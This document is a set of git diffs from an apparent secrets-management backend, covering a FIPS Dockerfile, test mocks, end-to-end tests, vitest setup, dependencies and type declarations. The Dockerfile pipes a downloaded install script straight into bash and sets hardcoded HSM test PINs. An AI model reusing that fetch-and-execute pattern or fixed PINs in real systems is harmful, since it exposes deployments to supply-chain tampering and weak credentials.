WORKDIR ${SOFTHSM2_SOURCES}
RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \
&& sh autogen.sh \
&& ./configure --prefix=/usr/local --disable-gost \
&& make \
&& make install
WORKDIR /root
RUN rm -fr ${SOFTHSM2_SOURCES}
# Install pkcs11-tool
RUN apt-get install -y opensc
RUN mkdir -p /etc/softhsm2/tokens && \
softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
WORKDIR /openssl-build
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
&& tar -xf openssl-3.1.2.tar.gz \
&& cd openssl-3.1.2 \
&& ./Configure enable-fips \
&& make \
&& make install_fips \
&& cd / \
&& rm -rf /openssl-build \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
# ? App setup
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && \
apt-get install -y infisical=0.41.89
WORKDIR /app
COPY package.json package.json
COPY package-lock.json package-lock.json
RUN npm install
COPY . .
ENV HOST=0.0.0.0
ENV OPENSSL_CONF=/app/nodejs.fips.cnf
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
ENV FIPS_ENABLED=true
CMD ["npm", "run", "dev:docker"]

View File

@@ -1,22 +1,14 @@
import RE2 from "re2";
import { TKeyStoreFactory } from "@app/keystore/keystore";
import { applyJitter } from "@app/lib/dates";
import { delay as delayMs } from "@app/lib/delay";
import { Lock } from "@app/lib/red-lock";
export const mockKeyStore = (): TKeyStoreFactory => {
const store: Record<string, string | number | Buffer> = {};
const getRegex = (pattern: string) =>
new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
return {
setItem: async (key, value) => {
store[key] = value;
return "OK";
},
setExpiry: async () => 0,
setItemWithExpiry: async (key, value) => {
store[key] = value;
return "OK";
@@ -25,27 +17,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
delete store[key];
return 1;
},
deleteItems: async ({ pattern, batchSize = 500, delay = 1500, jitter = 200 }) => {
const regex = getRegex(pattern);
let totalDeleted = 0;
const keys = Object.keys(store);
for (let i = 0; i < keys.length; i += batchSize) {
const batch = keys.slice(i, i + batchSize);
for (const key of batch) {
if (regex.test(key)) {
delete store[key];
totalDeleted += 1;
}
}
// eslint-disable-next-line no-await-in-loop
await delayMs(Math.max(0, applyJitter(delay, jitter)));
}
return totalDeleted;
},
getItem: async (key) => {
const value = store[key];
if (typeof value === "string") {
@@ -56,27 +27,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
incrementBy: async () => {
return 1;
},
getItems: async (keys) => {
const values = keys.map((key) => {
const value = store[key];
if (typeof value === "string") {
return value;
}
return null;
});
return values;
},
getKeysByPattern: async (pattern) => {
const regex = getRegex(pattern);
const keys = Object.keys(store);
return keys.filter((key) => regex.test(key));
},
deleteItemsByKeyIn: async (keys) => {
for (const key of keys) {
delete store[key];
}
return keys.length;
},
acquireLock: () => {
return Promise.resolve({
release: () => {}

View File

@@ -11,7 +11,6 @@ export const mockQueue = (): TQueueServiceFactory => {
job[name] = jobData;
},
queuePg: async () => {},
schedulePg: async () => {},
initialize: async () => {},
shutdown: async () => undefined,
stopRepeatableJob: async () => true,
@@ -24,10 +23,8 @@ export const mockQueue = (): TQueueServiceFactory => {
events[name] = event;
},
getRepeatableJobs: async () => [],
getDelayedJobs: async () => [],
clearQueue: async () => {},
stopJobById: async () => {},
stopJobByIdPg: async () => {},
stopRepeatableJobByJobId: async () => true,
stopRepeatableJobByKey: async () => true
};

View File

@@ -1,9 +1,8 @@
import crypto from "node:crypto";
import { SecretType, TSecrets } from "@app/db/schemas";
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
import { initEnvConfig } from "@app/lib/config/env";
import { SymmetricKeySize } from "@app/lib/crypto";
import { crypto } from "@app/lib/crypto/cryptography";
import { initLogger, logger } from "@app/lib/logger";
import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
const createServiceToken = async (
scopes: { environment: string; secretPath: string }[],
@@ -27,8 +26,7 @@ const createServiceToken = async (
});
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
const projectKey = crypto.encryption().asymmetric().decrypt({
const projectKey = decryptAsymmetric({
ciphertext: projectKeyEnc.encryptedKey,
nonce: projectKeyEnc.nonce,
publicKey: projectKeyEnc.sender.publicKey,
@@ -36,13 +34,7 @@ const createServiceToken = async (
});
const randomBytes = crypto.randomBytes(16).toString("hex");
const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
plaintext: projectKey,
key: randomBytes,
keySize: SymmetricKeySize.Bits128
});
const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
const serviceTokenRes = await testServer.inject({
method: "POST",
url: "/api/v2/service-token",
@@ -145,9 +137,6 @@ describe("Service token secret ops", async () => {
let projectKey = "";
let folderId = "";
beforeAll(async () => {
initLogger();
await initEnvConfig(testSuperAdminDAL, logger);
serviceToken = await createServiceToken(
[{ secretPath: "/**", environment: seedData1.environment.slug }],
["read", "write"]
@@ -164,13 +153,11 @@ describe("Service token secret ops", async () => {
expect(serviceTokenInfoRes.statusCode).toBe(200);
const serviceTokenInfo = serviceTokenInfoRes.json();
const serviceTokenParts = serviceToken.split(".");
projectKey = crypto.encryption().symmetric().decrypt({
projectKey = decryptSymmetric128BitHexKeyUTF8({
key: serviceTokenParts[3],
tag: serviceTokenInfo.tag,
ciphertext: serviceTokenInfo.encryptedKey,
iv: serviceTokenInfo.iv,
keySize: SymmetricKeySize.Bits128
iv: serviceTokenInfo.iv
});
// create a deep folder

View File

@@ -1,8 +1,6 @@
import { SecretType, TSecrets } from "@app/db/schemas";
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
import { initEnvConfig } from "@app/lib/config/env";
import { crypto } from "@app/lib/crypto/cryptography";
import { initLogger, logger } from "@app/lib/logger";
import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
import { AuthMode } from "@app/services/auth/auth-type";
const createSecret = async (dto: {
@@ -157,9 +155,6 @@ describe("Secret V3 Router", async () => {
let projectKey = "";
let folderId = "";
beforeAll(async () => {
initLogger();
await initEnvConfig(testSuperAdminDAL, logger);
const projectKeyRes = await testServer.inject({
method: "GET",
url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -178,7 +173,7 @@ describe("Secret V3 Router", async () => {
});
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
projectKey = crypto.encryption().asymmetric().decrypt({
projectKey = decryptAsymmetric({
ciphertext: projectKeyEncryptionDetails.encryptedKey,
nonce: projectKeyEncryptionDetails.nonce,
publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -674,7 +669,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
const { user: userInfo } = JSON.parse(userInfoRes.payload);
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
const projectKey = crypto.encryption().asymmetric().decrypt({
const projectKey = decryptAsymmetric({
ciphertext: projectKeyEnc.encryptedKey,
nonce: projectKeyEnc.nonce,
publicKey: projectKeyEnc.sender.publicKey,
@@ -690,7 +685,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
});
expect(projectBotRes.statusCode).toEqual(200);
const projectBot = JSON.parse(projectBotRes.payload).bot;
const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
// set bot as active
const setBotActive = await testServer.inject({

View File

@@ -2,11 +2,11 @@
import "ts-node/register";
import dotenv from "dotenv";
import { crypto } from "@app/lib/crypto/cryptography";
import jwt from "jsonwebtoken";
import path from "path";
import { seedData1 } from "@app/db/seed-data";
import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
import { initEnvConfig } from "@app/lib/config/env";
import { initLogger } from "@app/lib/logger";
import { main } from "@app/server/app";
import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -15,9 +15,8 @@ import { mockSmtpServer } from "./mocks/smtp";
import { initDbConnection } from "@app/db";
import { queueServiceFactory } from "@app/queue";
import { keyStoreFactory } from "@app/keystore/keystore";
import { Redis } from "ioredis";
import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
import { buildRedisFromConfig } from "@app/lib/config/redis";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
export default {
@@ -25,17 +24,13 @@ export default {
transformMode: "ssr",
async setup() {
const logger = initLogger();
const databaseCredentials = getDatabaseCredentials(logger);
const envConfig = initEnvConfig(logger);
const db = initDbConnection({
dbConnectionUri: databaseCredentials.dbConnectionUri,
dbRootCert: databaseCredentials.dbRootCert
dbConnectionUri: envConfig.DB_CONNECTION_URI,
dbRootCert: envConfig.DB_ROOT_CERT
});
const superAdminDAL = superAdminDALFactory(db);
const envCfg = await initEnvConfig(superAdminDAL, logger);
const redis = buildRedisFromConfig(envCfg);
const redis = new Redis(envConfig.REDIS_URL);
await redis.flushdb("SYNC");
try {
@@ -60,10 +55,10 @@ export default {
});
const smtp = mockSmtpServer();
const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
const keyStore = keyStoreFactory(envCfg);
const queue = queueServiceFactory(envConfig.REDIS_URL, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
const keyStore = keyStoreFactory(envConfig.REDIS_URL);
const hsmModule = initializeHsmModule(envCfg);
const hsmModule = initializeHsmModule(envConfig);
hsmModule.initialize();
const server = await main({
@@ -73,17 +68,14 @@ export default {
queue,
keyStore,
hsmModule: hsmModule.getModule(),
superAdminDAL,
redis,
envConfig: envCfg
envConfig
});
// @ts-expect-error type
globalThis.testServer = server;
// @ts-expect-error type
globalThis.testSuperAdminDAL = superAdminDAL;
// @ts-expect-error type
globalThis.jwtAuthToken = crypto.jwt().sign(
globalThis.jwtAuthToken = jwt.sign(
{
authTokenType: AuthTokenType.ACCESS_TOKEN,
userId: seedData1.id,
@@ -92,8 +84,8 @@ export default {
organizationId: seedData1.organization.id,
accessVersion: 1
},
envCfg.AUTH_SECRET,
{ expiresIn: envCfg.JWT_AUTH_LIFETIME }
envConfig.AUTH_SECRET,
{ expiresIn: envConfig.JWT_AUTH_LIFETIME }
);
} catch (error) {
// eslint-disable-next-line
@@ -110,8 +102,6 @@ export default {
// @ts-expect-error type
delete globalThis.testServer;
// @ts-expect-error type
delete globalThis.testSuperAdminDAL;
// @ts-expect-error type
delete globalThis.jwtToken;
// called after all tests with this env have been run
await db.migrate.rollback(
@@ -130,3 +120,4 @@ export default {
};
}
};

View File

@@ -1,16 +0,0 @@
nodejs_conf = nodejs_init
.include /usr/local/ssl/fipsmodule.cnf
[nodejs_init]
providers = provider_sect
[provider_sect]
default = default_sect
fips = fips_sect
[default_sect]
activate = 1
[algorithm_sect]
default_properties = fips=yes

12059
backend/package-lock.json generated

File diff suppressed because it is too large Load Diff

View File

@@ -38,9 +38,8 @@
"build:frontend": "npm run build --prefix ../frontend",
"start": "node --enable-source-maps dist/main.mjs",
"type:check": "tsc --noEmit",
"lint:fix": "node --max-old-space-size=8192 ./node_modules/.bin/eslint --fix --ext js,ts ./src",
"lint": "node --max-old-space-size=8192 ./node_modules/.bin/eslint 'src/**/*.ts'",
"test:unit": "vitest run -c vitest.unit.config.ts",
"lint:fix": "eslint --fix --ext js,ts ./src",
"lint": "eslint 'src/**/*.ts'",
"test:e2e": "vitest run -c vitest.e2e.config.ts --bail=1",
"test:e2e-watch": "vitest -c vitest.e2e.config.ts --bail=1",
"test:e2e-coverage": "vitest run --coverage -c vitest.e2e.config.ts",
@@ -61,19 +60,10 @@
"migration:status": "npm run auditlog-migration:status && knex --knexfile ./dist/db/knexfile.mjs --client pg migrate:status",
"migration:rollback": "npm run auditlog-migration:rollback && knex --knexfile ./dist/db/knexfile.mjs migrate:rollback",
"migration:unlock": "npm run auditlog-migration:unlock && knex --knexfile ./dist/db/knexfile.mjs migrate:unlock",
"migration:up-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:up",
"migration:down-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:down",
"migration:list-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:list",
"migration:latest-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:latest",
"migration:status-dev": "knex --knexfile ./src/db/knexfile.ts --client pg migrate:status",
"migration:rollback-dev": "knex --knexfile ./src/db/knexfile.ts migrate:rollback",
"migration:unlock-dev": "knex --knexfile ./src/db/knexfile.ts migrate:unlock",
"migrate:org": "tsx ./scripts/migrate-organization.ts",
"seed:new": "tsx ./scripts/create-seed-file.ts",
"seed": "knex --knexfile ./dist/db/knexfile.ts --client pg seed:run",
"seed-dev": "knex --knexfile ./src/db/knexfile.ts --client pg seed:run",
"db:reset": "npm run migration:rollback -- --all && npm run migration:latest",
"email:dev": "email dev --dir src/services/smtp/emails"
"db:reset": "npm run migration:rollback -- --all && npm run migration:latest"
},
"keywords": [],
"author": "",
@@ -84,21 +74,20 @@
"@babel/plugin-syntax-import-attributes": "^7.24.7",
"@babel/preset-env": "^7.18.10",
"@babel/preset-react": "^7.24.7",
"@smithy/types": "^4.3.1",
"@types/bcrypt": "^5.0.2",
"@types/jmespath": "^0.15.2",
"@types/jsonwebtoken": "^9.0.5",
"@types/jsrp": "^0.2.6",
"@types/libsodium-wrappers": "^0.7.13",
"@types/lodash.isequal": "^4.5.8",
"@types/node": "^20.17.30",
"@types/node": "^20.9.5",
"@types/nodemailer": "^6.4.14",
"@types/passport-github": "^1.1.12",
"@types/passport-google-oauth20": "^2.0.14",
"@types/pg": "^8.10.9",
"@types/picomatch": "^2.3.3",
"@types/pkcs11js": "^1.0.4",
"@types/prompt-sync": "^4.2.3",
"@types/react": "^19.1.2",
"@types/resolve": "^1.20.6",
"@types/safe-regex": "^1.1.6",
"@types/sjcl": "^1.0.34",
@@ -118,7 +107,6 @@
"nodemon": "^3.0.2",
"pino-pretty": "^10.2.3",
"prompt-sync": "^4.2.0",
"react-email": "4.0.7",
"rimraf": "^5.0.5",
"ts-node": "^10.9.2",
"tsc-alias": "^1.8.8",
@@ -132,7 +120,6 @@
"@aws-sdk/client-elasticache": "^3.637.0",
"@aws-sdk/client-iam": "^3.525.0",
"@aws-sdk/client-kms": "^3.609.0",
"@aws-sdk/client-route-53": "^3.810.0",
"@aws-sdk/client-secrets-manager": "^3.504.0",
"@aws-sdk/client-sts": "^3.600.0",
"@casl/ability": "^6.5.0",
@@ -150,46 +137,38 @@
"@fastify/static": "^7.0.4",
"@fastify/swagger": "^8.14.0",
"@fastify/swagger-ui": "^2.1.0",
"@gitbeaker/rest": "^42.5.0",
"@google-cloud/kms": "^4.5.0",
"@infisical/quic": "^1.0.8",
"@node-saml/passport-saml": "^5.1.0",
"@octokit/auth-app": "^7.1.1",
"@octokit/core": "^5.2.1",
"@octokit/plugin-paginate-graphql": "^4.0.1",
"@octokit/plugin-retry": "^5.0.5",
"@octokit/rest": "^20.0.2",
"@node-saml/passport-saml": "^4.0.4",
"@octokit/auth-app": "^7.1.5",
"@octokit/plugin-retry": "^7.1.4",
"@octokit/rest": "^21.1.1",
"@octokit/webhooks-types": "^7.3.1",
"@octopusdeploy/api-client": "^3.4.1",
"@opentelemetry/api": "^1.9.0",
"@opentelemetry/auto-instrumentations-node": "^0.53.0",
"@opentelemetry/exporter-metrics-otlp-proto": "^0.55.0",
"@opentelemetry/exporter-prometheus": "^0.55.0",
"@opentelemetry/instrumentation": "^0.55.0",
"@opentelemetry/instrumentation-http": "^0.57.2",
"@opentelemetry/resources": "^1.28.0",
"@opentelemetry/sdk-metrics": "^1.28.0",
"@opentelemetry/semantic-conventions": "^1.27.0",
"@peculiar/asn1-schema": "^2.3.8",
"@peculiar/x509": "^1.12.1",
"@react-email/components": "0.0.36",
"@serdnam/pino-cloudwatch-transport": "^1.0.4",
"@sindresorhus/slugify": "1.1.0",
"@slack/oauth": "^3.0.2",
"@slack/web-api": "^7.8.0",
"@ucast/mongo2js": "^1.3.4",
"acme-client": "^5.4.0",
"ajv": "^8.12.0",
"argon2": "^0.31.2",
"aws-sdk": "^2.1553.0",
"axios": "^1.11.0",
"axios": "^1.6.7",
"axios-retry": "^4.0.0",
"bcrypt": "^5.1.1",
"botbuilder": "^4.23.2",
"bullmq": "^5.4.2",
"cassandra-driver": "^4.7.2",
"connect-redis": "^7.1.1",
"cron": "^3.1.7",
"dd-trace": "^5.40.0",
"dotenv": "^16.4.1",
"fastify": "^4.28.1",
"fastify-plugin": "^4.5.1",
@@ -198,7 +177,6 @@
"handlebars": "^4.7.8",
"hdb": "^0.19.10",
"ioredis": "^5.3.2",
"isomorphic-dompurify": "^2.22.0",
"jmespath": "^0.16.0",
"jsonwebtoken": "^9.0.2",
"jsrp": "^0.2.4",
@@ -213,16 +191,16 @@
"mysql2": "^3.9.8",
"nanoid": "^3.3.8",
"nodemailer": "^6.9.9",
"oci-sdk": "^2.108.0",
"odbc": "^2.4.9",
"openai": "^4.85.4",
"openid-client": "^5.6.5",
"ora": "^7.0.1",
"oracledb": "^6.4.0",
"otplib": "^12.0.1",
"passport-github": "^1.1.0",
"passport-gitlab2": "^5.0.0",
"passport-google-oauth20": "^2.0.0",
"passport-ldapauth": "^3.0.1",
"passport-oauth2": "^1.8.0",
"pg": "^8.11.3",
"pg-boss": "^10.1.5",
"pg-query-stream": "^4.5.3",
@@ -232,9 +210,6 @@
"pkijs": "^3.2.4",
"posthog-node": "^3.6.2",
"probot": "^13.3.8",
"re2": "^1.21.4",
"react": "19.1.0",
"react-dom": "19.1.0",
"safe-regex": "^2.1.1",
"scim-patch": "^0.8.3",
"scim2-parse-filter": "^0.2.10",
@@ -246,6 +221,6 @@
"tweetnacl-util": "^0.15.1",
"uuid": "^9.0.1",
"zod": "^3.22.4",
"zod-to-json-schema": "^3.24.5"
"zod-to-json-schema": "^3.22.4"
}
}

View File

@@ -84,11 +84,6 @@ const getZodDefaultValue = (type: unknown, value: string | number | boolean | Ob
}
};
const bigIntegerColumns: Record<string, string[]> = {
"folder_commits": ["commitId"]
};
const main = async () => {
const tables = (
await db("information_schema.tables")
@@ -113,9 +108,6 @@ const main = async () => {
const columnName = columnNames[colNum];
const colInfo = columns[columnName];
let ztype = getZodPrimitiveType(colInfo.type);
if (bigIntegerColumns[tableName]?.includes(columnName)) {
ztype = "z.coerce.bigint()";
}
if (["zodBuffer"].includes(ztype)) {
zodImportSet.add(ztype);
}

View File

@@ -0,0 +1,7 @@
import "@fastify/request-context";
declare module "@fastify/request-context" {
interface RequestContextData {
reqId: string;
}
}

View File

@@ -2,7 +2,6 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
import { CustomLogger } from "@app/lib/logger/logger";
import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
declare global {
type FastifyZodProvider = FastifyInstance<
@@ -15,6 +14,5 @@ declare global {
// used only for testing
const testServer: FastifyZodProvider;
const testSuperAdminDAL: TSuperAdminDALFactory;
const jwtAuthToken: string;
}

View File

@@ -3,18 +3,16 @@ import "fastify";
import { Redis } from "ioredis";
import { TUsers } from "@app/db/schemas";
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-types";
import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-types";
import { TAuditLogServiceFactory, TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-types";
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-types";
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-service";
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-service";
import { TAuditLogServiceFactory } from "@app/ee/services/audit-log/audit-log-service";
import { TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-service";
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-service";
import { TCertificateEstServiceFactory } from "@app/ee/services/certificate-est/certificate-est-service";
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-types";
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-types";
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-service";
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-service";
import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service";
import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service";
import { TGroupServiceFactory } from "@app/ee/services/group/group-service";
import { TIdentityProjectAdditionalPrivilegeServiceFactory } from "@app/ee/services/identity-project-additional-privilege/identity-project-additional-privilege-service";
import { TIdentityProjectAdditionalPrivilegeV2ServiceFactory } from "@app/ee/services/identity-project-additional-privilege-v2/identity-project-additional-privilege-v2-service";
@@ -24,25 +22,21 @@ import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service";
import { TLdapConfigServiceFactory } from "@app/ee/services/ldap-config/ldap-config-service";
import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-service";
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
import { TPitServiceFactory } from "@app/ee/services/pit/pit-service";
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-types";
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-types";
import { RateLimitConfiguration, TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-types";
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-types";
import { TScimServiceFactory } from "@app/ee/services/scim/scim-types";
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service";
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-service";
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-service";
import { TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-service";
import { RateLimitConfiguration } from "@app/ee/services/rate-limit/rate-limit-types";
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-service";
import { TScimServiceFactory } from "@app/ee/services/scim/scim-service";
import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service";
import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service";
import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service";
import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service";
import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service";
import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service";
import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service";
import { TSshCertificateAuthorityServiceFactory } from "@app/ee/services/ssh/ssh-certificate-authority-service";
import { TSshCertificateTemplateServiceFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-service";
import { TSshHostServiceFactory } from "@app/ee/services/ssh-host/ssh-host-service";
import { TSshHostGroupServiceFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-service";
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-types";
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-service";
import { TAuthMode } from "@app/server/plugins/auth/inject-identity";
import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service";
import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service";
@@ -51,49 +45,39 @@ import { TAuthPasswordFactory } from "@app/services/auth/auth-password-service";
import { TAuthSignupFactory } from "@app/services/auth/auth-signup-service";
import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type";
import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
import { TAutomatedSecurityServiceFactory } from "@app/services/automated-security/automated-security-service";
import { TCertificateServiceFactory } from "@app/services/certificate/certificate-service";
import { TCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/certificate-authority-service";
import { TInternalCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-service";
import { TCertificateTemplateServiceFactory } from "@app/services/certificate-template/certificate-template-service";
import { TCmekServiceFactory } from "@app/services/cmek/cmek-service";
import { TExternalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service";
import { TExternalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service";
import { TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
import { TGroupProjectServiceFactory } from "@app/services/group-project/group-project-service";
import { THsmServiceFactory } from "@app/services/hsm/hsm-service";
import { TIdentityServiceFactory } from "@app/services/identity/identity-service";
import { TIdentityAccessTokenServiceFactory } from "@app/services/identity-access-token/identity-access-token-service";
import { TIdentityAliCloudAuthServiceFactory } from "@app/services/identity-alicloud-auth/identity-alicloud-auth-service";
import { TIdentityAwsAuthServiceFactory } from "@app/services/identity-aws-auth/identity-aws-auth-service";
import { TIdentityAzureAuthServiceFactory } from "@app/services/identity-azure-auth/identity-azure-auth-service";
import { TIdentityGcpAuthServiceFactory } from "@app/services/identity-gcp-auth/identity-gcp-auth-service";
import { TIdentityJwtAuthServiceFactory } from "@app/services/identity-jwt-auth/identity-jwt-auth-service";
import { TIdentityKubernetesAuthServiceFactory } from "@app/services/identity-kubernetes-auth/identity-kubernetes-auth-service";
import { TIdentityLdapAuthServiceFactory } from "@app/services/identity-ldap-auth/identity-ldap-auth-service";
import { TAllowedFields } from "@app/services/identity-ldap-auth/identity-ldap-auth-types";
import { TIdentityOciAuthServiceFactory } from "@app/services/identity-oci-auth/identity-oci-auth-service";
import { TIdentityOidcAuthServiceFactory } from "@app/services/identity-oidc-auth/identity-oidc-auth-service";
import { TIdentityProjectServiceFactory } from "@app/services/identity-project/identity-project-service";
import { TIdentityTlsCertAuthServiceFactory } from "@app/services/identity-tls-cert-auth/identity-tls-cert-auth-types";
import { TIdentityTokenAuthServiceFactory } from "@app/services/identity-token-auth/identity-token-auth-service";
import { TIdentityUaServiceFactory } from "@app/services/identity-ua/identity-ua-service";
import { TIntegrationServiceFactory } from "@app/services/integration/integration-service";
import { TIntegrationAuthServiceFactory } from "@app/services/integration-auth/integration-auth-service";
import { TMicrosoftTeamsServiceFactory } from "@app/services/microsoft-teams/microsoft-teams-service";
import { TOrgRoleServiceFactory } from "@app/services/org/org-role-service";
import { TOrgServiceFactory } from "@app/services/org/org-service";
import { TOrgAdminServiceFactory } from "@app/services/org-admin/org-admin-service";
import { TPkiAlertServiceFactory } from "@app/services/pki-alert/pki-alert-service";
import { TPkiCollectionServiceFactory } from "@app/services/pki-collection/pki-collection-service";
import { TPkiSubscriberServiceFactory } from "@app/services/pki-subscriber/pki-subscriber-service";
import { TPkiTemplatesServiceFactory } from "@app/services/pki-templates/pki-templates-service";
import { TProjectServiceFactory } from "@app/services/project/project-service";
import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service";
import { TProjectEnvServiceFactory } from "@app/services/project-env/project-env-service";
import { TProjectKeyServiceFactory } from "@app/services/project-key/project-key-service";
import { TProjectMembershipServiceFactory } from "@app/services/project-membership/project-membership-service";
import { TProjectRoleServiceFactory } from "@app/services/project-role/project-role-service";
import { TReminderServiceFactory } from "@app/services/reminder/reminder-types";
import { TSecretServiceFactory } from "@app/services/secret/secret-service";
import { TSecretBlindIndexServiceFactory } from "@app/services/secret-blind-index/secret-blind-index-service";
import { TSecretFolderServiceFactory } from "@app/services/secret-folder/secret-folder-service";
@@ -116,35 +100,12 @@ import { TWorkflowIntegrationServiceFactory } from "@app/services/workflow-integ
declare module "@fastify/request-context" {
interface RequestContextData {
reqId: string;
orgId?: string;
identityAuthInfo?: {
identityId: string;
oidc?: {
claims: Record<string, string>;
};
kubernetes?: {
namespace: string;
name: string;
};
aws?: {
accountId: string;
arn: string;
userId: string;
partition: string;
service: string;
resourceType: string;
resourceName: string;
};
};
identityPermissionMetadata?: Record<string, unknown>; // filled by permission service
assumedPrivilegeDetails?: { requesterId: string; actorId: string; actorType: ActorType; projectId: string };
}
}
declare module "fastify" {
interface Session {
callbackPort: string;
isAdminLogin: boolean;
}
interface FastifyRequest {
